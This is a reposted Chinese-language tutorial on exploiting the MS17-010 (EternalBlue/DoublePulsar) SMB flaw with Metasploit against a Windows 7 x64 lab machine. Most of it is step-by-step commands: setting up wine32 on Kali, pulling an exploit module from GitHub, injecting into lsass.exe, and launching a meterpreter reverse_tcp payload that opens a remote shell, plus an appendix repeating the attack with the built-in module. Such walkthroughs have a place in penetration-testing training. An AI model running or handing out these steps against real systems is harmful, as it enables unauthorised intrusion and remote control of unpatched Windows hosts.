kali linux安装wine32,永恒之蓝msf下 ms17_010 (64位kali下安装wine32)

本次用到的环境:

kali(2016.2)32位系统.ip地址:192.168.1.104

目标靶机为:win7sp1x64系统(关闭防火墙),ip地址:192.168.1.105

=================================

若kali为64位

windows为32

需要安装wine32 ,但64位的kali下无法apt-get install wine32

在执行exploit时会出现 :

it looks like wine32 is missing, you should install it.

multiarch needs to be enabled first. as root, please

execute "dpkg --add-architecture i386 && apt-get update &&

apt-get install wine32"

按照上面的方法dpkg --add-architecture i386 && apt-get update &&

apt-get install wine32即可

=================================

具体的步骤如下:

kali系统下安装wine32:

apt-get install wine32

21fdecc8da3c14e3a66dbe7c7477b0fc.png

用wine32执行cmd.exe

wine cmd.exe

3c31fd8ef64286ce7931eec5f6c62b95.png

exit //退出

af25c1c6b68e19c9bfe05478156f83a4.png

git  clone下载其利用脚本:

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

然后将脚本拷贝到 /usr/share/metasploit-framework/modules/exploits/windows/smb

cd Eternalblue-Doublepulsar-Metasploit/

cp -r deps/ eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb

7bfc956d17422c2d1c7ffe482ce90361.png

6327a80656fea4d5388faf61f3c7506a.png

启动msf,然后进行一系列设置:

service postgresql start

msfconsole

776e79a05e71524a5af20851666060c7.png

search eternalblue

use exploit/windows/smb/eternalblue_doublepulsar

5abba64ece8bddadb9654fb23c3eb2ba.png

57bb05a793ea794c70af7c661c957ebe.png

set DOUBLEPULSARPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps

set ETERNALBLUEPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps

set PROCESSINJECT lsass.exe

set TARGETARCHITECTURE x64

set rhost 192.168.1.105

show targets

set target 9

set payload windows/x64/meterpreter/reverse_tcp

show options

set lhost 192.168.1.104

exploit

57bb05a793ea794c70af7c661c957ebe.png

29d7f9c189edc30092d07df14c45b640.png

b7c87844fa8d065b4f65a21b7efa004e.png

ddd0aff8bef50b3f3d3fba4a3390d0b5.png

8c447e9e5a44caa4bd434a5985ac2893.png

附录:

msf下的ms17-010模块:

前提条件:

1. gem install ruby_smb #ruby_smb模块安装

2.msfupdate   #msf的更新

3.msfconsole -qx "use exploit/windows/smb/ms17_010_eternalblue"  #启动并加载模块

57bb05a793ea794c70af7c661c957ebe.png

root@backlion:/opt# wget https://raw.githubusercontent.com/backlion/metasploit-framework/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb

root@backlion:/opt# cp ms17_010_eternalblue.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb

Use exploit/windows/smb/ms17_010_eternalblue

msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.8

msf exploit(ms17_010_eternalblue) >set lhost 192.168.1.21

msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp

msf exploit(ms17_010_eternalblue) >exploit

Meterpreter> sysinfo

57bb05a793ea794c70af7c661c957ebe.png

78bd61fdb9623e55df5d1978b849c36e.png

转载:https://www.cnblogs.com/backlion/p/6804863.html